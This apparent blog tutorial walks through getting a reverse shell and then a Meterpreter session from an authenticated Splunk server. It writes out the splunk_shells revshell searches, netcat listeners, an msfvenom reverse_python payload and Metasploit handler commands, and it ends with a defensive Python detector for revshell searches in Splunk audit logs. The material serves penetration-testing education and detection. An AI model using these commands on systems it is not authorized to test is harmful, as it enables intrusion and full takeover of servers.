Penetration Testing with Splunk

By Justin Balroop

Splunk is software mainly used for searching, monitoring, and examining machine-generated data, or “Big Data”, through a web-style interface in order to provide operational intelligence. Splunk captures, indexes, and correlates real-time data in a searchable container from which it can produce graphs, reports, alerts, dashboards, and visualizations. It aims to make machine-generated data available across an organization, and it can recognize data patterns, produce metrics, diagnose problems, and provide intelligence for business operations. Splunk is used for application management, security, and compliance, as well as business and web analytics. Its main advantage is that it does not need a separate database to store its data, since it stores everything in its own indexes. With Splunk, searching for a particular piece of data within a large and complex data set is easy. For example, working out from log files which configuration is currently running can be challenging; Splunk includes a tool that helps the user detect configuration file problems and see the configurations currently in use.

Now to take things to another level, a user can exploit Splunk to obtain a reverse shell. This can be done maliciously by an attacker, or by a penetration tester looking to improve the security of their IT infrastructure. The walkthrough below uses a Linux platform (Ubuntu); the same can be done on a Windows platform as well. Keep in mind that this is an authenticated exploit, so you must have valid Splunk credentials in order to use it.

First, we download the latest version of Splunk Enterprise and log in with the credentials created beforehand, as seen in the screenshot below.

Next, go to the URL of your Splunk Enterprise graphical user interface, which is listed in the screenshot above.

Once you enter your credentials, you can see the Splunk homepage. Now, we can begin the exploitation phase. So far we have covered how to deploy Splunk onto a local machine, which in this case is Ubuntu. We can now move on to Splunk penetration testing, in which we will try to exploit Splunk by obtaining a reverse shell from the machine.

In order to exploit Splunk, download the latest release of the splunk_shells application from its GitHub repository. This application is designed to help with penetration testing and red teaming within IT infrastructures that have Splunk deployment(s). It allows the user to generate a reverse shell from a Splunk server and then interact with that server as they please within the environment. After obtaining the contents of the GitHub repository, you are able to upload them to your Splunk server. This can be done by logging onto the Splunk GUI from a Kali Linux machine, for example, by visiting the IP address of the Ubuntu server followed by port 8000. This machine will act as the attacker or penetration tester. This can be seen in the screenshot below.

Next, navigate to “Manage Apps” and install the “splunk_shells” application that was downloaded from GitHub, as seen in the screenshots below.

After installing the application, you are then required to restart Splunk Enterprise. After restarting, you are then able to view the newly installed application under the “Apps” section labeled “Weaponize Splunk for Pentesting and Red Teaming”, as seen below.

Now that we have installed the application acquired from GitHub, we can execute the reverse shell. To do so, navigate to the search bar in Splunk and enter the command that requests a reverse shell of the standard type, connecting back to our machine’s IP address on the listening port. The search command looks like this: “| revshell std 1234”.

After issuing that command, we move to our attacking Kali Linux machine. On this machine, we start “netcat”, a back-end tool that lets us scan and listen on ports. Believe it or not, you can transfer files directly through “netcat” or use it as a backdoor into other systems on the network. In this case, we issue the command “nc -lvp 1234” on the Kali Linux machine. This puts netcat into “listening mode” for any inbound connections on the specified port, which in this case is port 1234, with verbose output. When executed, this command will return the root “uid” and “gid” information. However, in order to obtain a proper shell, we need to dig deeper. This can be accomplished by using “MSFVenom”.

“MSFVenom” is the command line payload generator of the popular ethical hacking framework “Metasploit”. We will generate a Python payload for our Linux machine with this command: “msfvenom -p cmd/unix/reverse_python lhost= lport=1234 R”. The generated payload is delivered through the existing netcat session. However, for this to work properly, you must remember to start a new netcat listener inside a new terminal session. Once that netcat session is running, you can issue the following command: python -c 'import pty;pty.spawn("/bin/bash")'. This upgrades the connection to a proper shell.

Now that we have obtained a shell, we can use Metasploit’s multi handler to catch a “Meterpreter” reverse connection from the victim’s Ubuntu machine. “Meterpreter” is a “Metasploit” attack payload that provides an interactive shell in which the attacker can explore the target machine and execute any malicious code. This can also help penetration testers and security teams address vulnerabilities on the targeted systems. The commands for initiating the “Meterpreter” session are as follows:

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload python/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost
msf exploit(multi/handler) > set lport 9999
msf exploit(multi/handler) > exploit -j

The output of these commands will include “Started reverse TCP handler on” followed by the listener address. Now, type the following in the Splunk search bar: “| revshell msf 9999”. This opens a Meterpreter session, allowing the attacker to do as they please.

In this project, we can see how dangerous this type of attack can be when it involves powerful tools such as Splunk. Having a useful defensive tool like Splunk can be very beneficial for organizations, but when it falls into the wrong hands, it can be very detrimental to companies’ blue teams. As stated before, once the attacker has gone through with this attack, they can do whatever they please. The actions that can be performed after weaponizing Splunk include, but are not limited to, reviewing server logs, accessing local files, extracting user and/or machine data, executing malicious commands, and even taking down the network. That is why it is important for security specialists, especially blue teams, to be aware of such attacks in order to better protect their IT infrastructure.
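As an added defensive example (not from the original post or the splunk_shells project), the Python below parses Splunk _audit-style search records and flags any search that invokes the revshell custom command, so a blue team can alert on the searches used above. The sample audit lines, usernames and the watchlist are constructed assumptions; only the field layout follows Splunk's audit format.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Custom search commands that hand the caller a shell; "revshell" ships with splunk_shells.
SHELL_COMMANDS = frozenset({"revshell"})

# Constructed sample events modelled on index=_audit search records (users/times invented).
SAMPLE_AUDIT = """\
Audit:[timestamp=04-02-2023 10:14:02.115, user=jbalroop, action=search, info=granted , search='search index=_internal sourcetype=splunkd | head 5']
Audit:[timestamp=04-02-2023 10:16:40.902, user=admin, action=search, info=granted , search='| revshell std 1234']
Audit:[timestamp=04-02-2023 10:21:03.377, user=admin, action=search, info=granted , search='search index=main | revshell msf 9999']
"""

# key=value pairs: values are single-quoted (and may contain commas) or bare.
_FIELD = re.compile(r"(\w+)=('(?:[^'\\]|\\.)*'|[^,\]]*)")


def parse_audit_line(line: str) -> Optional[dict]:
    """Turn one Audit:[...] record into a dict of its key=value fields."""
    if not line.startswith("Audit:["):
        return None
    body = line[len("Audit:["):].rstrip("]")
    fields = {}
    for key, value in _FIELD.findall(body):
        value = value.strip()
        if value.startswith("'") and value.endswith("'") and len(value) > 1:
            value = value[1:-1]
        fields[key] = value
    return fields


def commands_in_search(spl: str) -> List[Tuple[str, List[str]]]:
    """(command, args) per pipe segment. Splitting on '|' ignores quoting, so a
    pipe inside a quoted literal adds a noise segment but never hides a command."""
    out = []
    for segment in spl.split("|"):
        tokens = segment.split()
        if tokens:
            out.append((tokens[0].lower(), tokens[1:]))
    return out


def find_shell_searches(lines: Iterable[str], watchlist=SHELL_COMMANDS) -> List[dict]:
    """Flag search events whose SPL invokes a watch-listed shell command."""
    hits = []
    for line in lines:
        ev = parse_audit_line(line)
        if not ev or ev.get("action") != "search":
            continue
        for cmd, args in commands_in_search(ev.get("search", "")):
            if cmd in watchlist:
                hits.append({"timestamp": ev.get("timestamp"), "user": ev.get("user"), "command": cmd, "args": args})
    return hits
```

Each hit carries the user, the command and its arguments (shell type and port), which is enough to triage the event and trace it back to the account that ran the search.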
